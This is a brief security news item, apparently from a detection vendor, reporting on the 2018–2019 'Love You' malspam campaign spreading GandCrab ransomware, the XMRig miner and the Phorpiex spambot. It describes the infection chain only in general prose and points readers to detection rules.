“Love You” Spam Campaign Distributes Malware Cocktail

Delaware, USA – January 15, 2019 – Despite the fact that there is still a whole month before Valentine’s Day, adversaries are sending spam emails with unexpected content. Security researcher Brad Duncan published his findings related to the campaign spreading Ransomware, cryptocurrency miner and spambot bundle. First attacks of the “Love You” campaign carried by Phorpiex botnet were spotted at the end of November 2018. The campaign got its name because of the attached zip archive, which starts with ‘Love_You_,’ and also because of the ‘love-themed’ subjects of emails, which changes in each new wave of malspam. The archive contains JavaScript, which runs the PowerShell command to download and execute a malicious file. Executable in turn downloads and installs GandCrab ransomware, XMRig and Phorpiex spambot. In addition, malware infects attached USB flash drives to spread on as many systems as possible.

The “Love You” campaign is not particularly sophisticated, but it is still very dangerous since the installed cocktail allows adversaries to effectively infect new systems and get profit from successfully attacked machines. Adversaries often use obfuscated PowerShell commands to deliver a final payload, because it allows bypassing signature-based antivirus solutions. To monitor the execution of PowerShell commands on Windows hosts you can use Sysmon Framework rule pack, which visualizes multiple security checks on Sysmon’s events and notifies about suspicious activity. You can also use the rules from Threat Detection Marketplace to detect the latest version of GandCrab Ransomware: https://tdm.socprime.com/tdm/info/1356/